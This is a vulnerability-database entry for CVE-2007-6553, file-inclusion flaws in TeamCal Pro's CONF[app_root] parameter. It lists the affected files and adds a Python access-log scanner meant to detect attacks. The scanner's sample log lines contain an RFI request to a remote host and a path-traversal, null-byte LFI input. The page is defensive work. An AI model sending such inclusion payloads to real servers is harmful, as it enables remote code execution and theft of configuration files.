CVE-2007-6553
TeamCal Pro < 3.1.000 - Remote Code Execution via CONF[app_root] Parameter
Title source: llm
Exploitation Summary
EIP tracks 1 public exploit for CVE-2007-6553. PoCs published by GoLd_M.
AI-analyzed exploit summary
The exploit demonstrates multiple Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities in TeamCal Pro <= 3.1.000. It provides specific URLs with crafted parameters to exploit these vulnerabilities, allowing an attacker to include arbitrary remote or local files.
Description
Multiple PHP remote file inclusion vulnerabilities in TeamCal Pro 3.1.000 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the CONF[app_root] parameter to (1) tcuser.class.php, (2) absencecount.inc.php, (3) avatar.inc.php, (4) csvhandler.class.php, (5) functions.tcpro.php, (6) header.html.inc.php, (7) joomlajack.tcpro.php, (8) menu.inc.php, (9) other.inc.php, (10) tcabsence.class.php, (11) tcabsencegroup.class.php, (12) tcallowance.class.php, (13) tcannouncement.class.php, (14) tcconfig.class.php, (15) tcdaynote.class.php, (16) tcgroup.class.php, (17) tcholiday.class.php, (18) tclogin.class.php, (19) tcmonth.class.php, (20) tctemplate.class.php, (21) tcusergroup.class.php, or (22) tcuseroption.class.php in includes/, possibly a related issue to CVE-2006-4845.
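As an added detection example (not code from EIP, the exploit author or the TeamCal Pro project), the Python below scans web-server access-log lines for requests that carry the CONF[app_root] parameter named in the description and labels each hit as RFI, LFI or plain injection; the log format, the client addresses and the sample parameter values are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Common/combined log format: client, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+)[^"]*" \d{3}')
# Any URL scheme (http://, ftp://, php://, data:) marks a remote include.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.-]+:", re.I)

def classify_app_root(value):
    """Label a client-supplied CONF[app_root] value: rfi, lfi or injected."""
    value = unquote(value)  # parse_qs decoded once; undo double encoding too
    if ".." in value or "\x00" in value:
        return "lfi"
    if SCHEME_RE.match(value):
        return "rfi"
    # CONF[] is populated from the application's config file, never from the
    # query string, so any client-supplied value is an injection attempt.
    return "injected"

def scan_access_log(lines):
    """Return one finding per request that carries CONF[app_root]."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qs percent-decodes names, so CONF%5Bapp_root%5D and
        # CONF[app_root] collapse onto the same key.
        params = parse_qs(parts.query, keep_blank_values=True)
        for raw in params.get("CONF[app_root]", []):
            findings.append({"ip": m.group("ip"), "path": parts.path,
                             "kind": classify_app_root(raw), "value": raw})
    return findings

# Constructed sample lines (not real traffic): one RFI against an affected
# include, one URL-encoded LFI, one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2008:13:55:36 +0000] "GET /teamcal/includes/'
    'tcuser.class.php?CONF[app_root]=http://203.0.113.9/rfi.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jan/2008:13:56:01 +0000] "GET /teamcal/includes/'
    'menu.inc.php?CONF%5Bapp_root%5D=..%2F..%2Fconfig.php%00 HTTP/1.1" 200 88',
    '192.0.2.10 - - [10/Jan/2008:13:57:12 +0000] "GET /teamcal/index.php?lang=en'
    ' HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f)
```

The same scan applies unchanged to the other 21 include files in the description, since the sink parameter name is identical for all of them.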
Exploits (1)